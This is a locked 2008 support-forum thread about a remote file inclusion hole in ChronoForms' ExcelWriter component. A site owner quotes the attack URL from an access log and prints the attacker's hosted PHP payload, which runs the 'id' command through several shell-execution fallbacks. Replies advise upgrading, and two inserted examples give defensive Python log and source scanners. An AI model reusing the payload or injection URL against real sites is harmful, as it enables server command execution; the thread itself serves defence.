I just checked my access log and found entries, that look like hacking attempts.
Can someone with more knowledge in these things confirm that and tell me what to do?
I think I secured our website as well as possible and the hacking attempts obviously didn't work out; nevertheless it scares me not to know what's going on there...
69.72.142.138 - - [31/Jan/2008:05:24:30 +0100] "GET /~admin92//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://doodlepacific.com/public_html/images/articles/gif.txt? HTTP/1.1" 302 471 "-" "libwww-perl/5.808"
where this gif.txt contains the following:
<?
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
There are some other entries that are very similar ...

Post edited by: GreyHead, at: 2008/02/01 13:39
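Added example, not part of the original post: a small Python triage pass over Apache combined-format logs that flags requests like the one quoted above, where a query parameter's value is itself a remote URL. The sample lines are constructed (documentation IPs and example domains), and the `script_answered` field is this example's own naming.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# A query parameter whose value is itself a remote URL is the mark of a
# remote file inclusion (RFI) probe like the one quoted in the post.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines, modelled on the entry in the post (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Jan/2008:05:24:30 +0100] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://files.example.net/gif.txt? HTTP/1.1" 302 471 "-" "libwww-perl/5.808"',
    '203.0.113.9 - - [31/Jan/2008:06:01:02 +0100] "GET /index.php?option=com_content&mosConfig_absolute_path=http%3A%2F%2Ffiles.example.net%2Fa.txt%3F HTTP/1.1" 200 5120 "-" "libwww-perl/5.808"',
    '192.0.2.10 - - [31/Jan/2008:06:05:00 +0100] "GET /index.php?option=com_content&task=view&id=3 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [31/Jan/2008:06:06:00 +0100] "GET /index.php?return=/forums/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def find_rfi_probes(lines):
    """Return one finding per query parameter that carries a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        path, _, query = m['target'].partition('?')
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value.strip()):
                findings.append({
                    'ip': m['ip'], 'time': m['time'], 'path': path,
                    'param': name, 'remote_url': value,
                    'status': int(m['status']),
                    # 200 means the targeted script answered: follow up on that request
                    'script_answered': m['status'] == '200',
                    'agent': m['agent'],
                })
    return findings

if __name__ == '__main__':
    for f in find_rfi_probes(SAMPLE_LOG):
        flag = 'FOLLOW UP' if f['script_answered'] else 'not served'
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']} -> {f['remote_url']} [{f['status']} {flag}]")
```

A 200 on a flagged line does not prove the inclusion worked, only that the targeted script was reached; those are the requests to check first.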
Hi,
I guess you don't have ChronoForms V2.3.7? If so then we have one of 3 solutions:
#1- upgrade to the latest version 2.3.7
#2- overwrite the folder excelwriter with the one in the latest version 2.3.7
#3- delete the whole excelwriter folder and don't use Excel backup of entries
Why did this happen? We used some script to create an Excel file for database records but the script had some holes and we got it fixed in the latest release!
Please let me know if you have any comments!
Cheers,
Max
OK, I tried to upgrade (which did not work) but uninstalled and installed 2.3.7.
Unfortunately, the backed up form could not be restored (it ran through but the fields were empty), but I copied the values manually out of the cfbak file ...
So this problem should be fixed!
I'm afraid, there is another one with the image verification: Klick4Thread
Thank you very much!

Post edited by: minimalniemand, at: 2008/02/01 12:10
Hi minimalniemand,
What happened with the upgrade? I've done several of these and they mostly run very smoothly. (Though with 2.3.5 to 2.3.6 I think you did need to open and re-save all the forms.)
Same with cfbak files - I've had twenty or more sent to me from different versions and they all open OK so far.
Bob
Hello
I think I have the same thing. I upgraded today to 2.3.7.
CHRONOFORMS version V2.3.5 has an exploit
(Remote File Include Vulnerability)
which is published online. I found it, but it's still new (2 days ago).
I saw in Google Analytics "inurl:/com_chronocontact" sent 5 total visits
and when I searched I found more about it.
I just want to know: will upgrading to the latest version solve everything?
Nothing to worry about? No infected files etc.?
And about these folders which are in the /administrator/chronocontact folder:
can I delete the (excelwriter) folder?
thank you
Hi ahmedk,
The exploit uses the PEAR ExcelWriter module which ChronoForms uses for Excel data backup. If you have ChronoForms 2.3.7 OR delete the ExcelWriter folder (if you don't need Excel backup) OR you replace the ExcelWriter folder with the latest PEAR version then all will be OK with this exploit.
Bob
Hi Bob,
to that end,
could we get the Chronoforms version we're using echoed out to the main chronoforms page?
that would help - I'm using it in a number of places - and upkeep can be tough (I know I should keep better track🙂 )...
anyways - just a thought
Thanks!
Rod
Hi Rod,
I think that's a good idea. Max! Are you listening??
Bob
PS It should be possible to flag up when there is a new version too.
Hi GreyHead
The PEAR ExcelWriter module of version 2.3.5 is vulnerable?
I haven't found differences between the files of version 2.3.5 and those of version 2.3.8
where is the patch?
Thanks!
Hi MMMario,
I forget exactly which version had the update. Just take the 'excelwriter' folder from the latest release and ftp and copy it over the previous installation.
Bob
Hi Bob
Sorry but I don't understand
Currently I have installed version 2.3.5, the PEAR ExcelWriter module of this version is vulnerable?
I ask you this because the files of the PEAR ExcelWriter module of new version 2.3.8 are equal to those of version 2.3.5 I have currently installed.
If it is true that they are equal, why I would have to replace them with the new files?
Could you help me better understand?
Thanks!
Hi Mario,
Actually No, the 2 excelwriter files are not identical, the issue was with the $mosConfig global variable used and this was removed, you can check this!
Hi Bob, Ok, I will add this version checker to the new release!
Cheers,
Max
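Added example, not ChronoForms code and not part of Max's reply: one way to run the check he describes, listing every line under an installed excelwriter folder that still uses a `$mosConfig_*` variable and marking those that feed an include or require. The file contents are constructed for the demo; `scan_sample` and the sample tree are assumptions of this example.

```python
import os
import re
import tempfile

MOSCONFIG_RE = re.compile(r'\$mosConfig_\w+')
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\b', re.IGNORECASE)

def scan_for_mosconfig(root):
    """List (relative path, line number, kind, text) for each $mosConfig_* use under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(('.php', '.inc')):
                continue
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            # latin-1 decodes any byte sequence, so old sources never raise here
            with open(full, encoding='latin-1') as fh:
                for number, line in enumerate(fh, 1):
                    if MOSCONFIG_RE.search(line):
                        # a path built from the variable is the dangerous case
                        kind = 'include' if INCLUDE_RE.search(line) else 'reference'
                        findings.append((rel, number, kind, line.strip()))
    return sorted(findings)

# Constructed file contents for the demo; NOT the real ChronoForms or PEAR sources.
SAMPLE_FILES = {
    'Writer/Worksheet.php': "<?php\nrequire_once($mosConfig_absolute_path . '/lib/Parser.php');\n",
    'Writer/Format.php': "<?php\nrequire_once 'PEAR.php';\nclass Format {}\n",
    'Writer.php': "<?php\n// $mosConfig_live_site is only mentioned in this comment\n",
}

def scan_sample():
    """Write SAMPLE_FILES to a temporary folder and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            path = os.path.join(root, *rel.split('/'))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, 'w', encoding='latin-1') as fh:
                fh.write(body)
        return scan_for_mosconfig(root)

if __name__ == '__main__':
    for rel, number, kind, text in scan_sample():
        print(f'{rel}:{number}: [{kind}] {text}')
```

Point `scan_for_mosconfig` at the installed excelwriter folder and at the one from the newer release; an empty result for the new copy and `include` hits in the old one is the difference Max refers to.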
This topic is locked and no more replies can be posted.
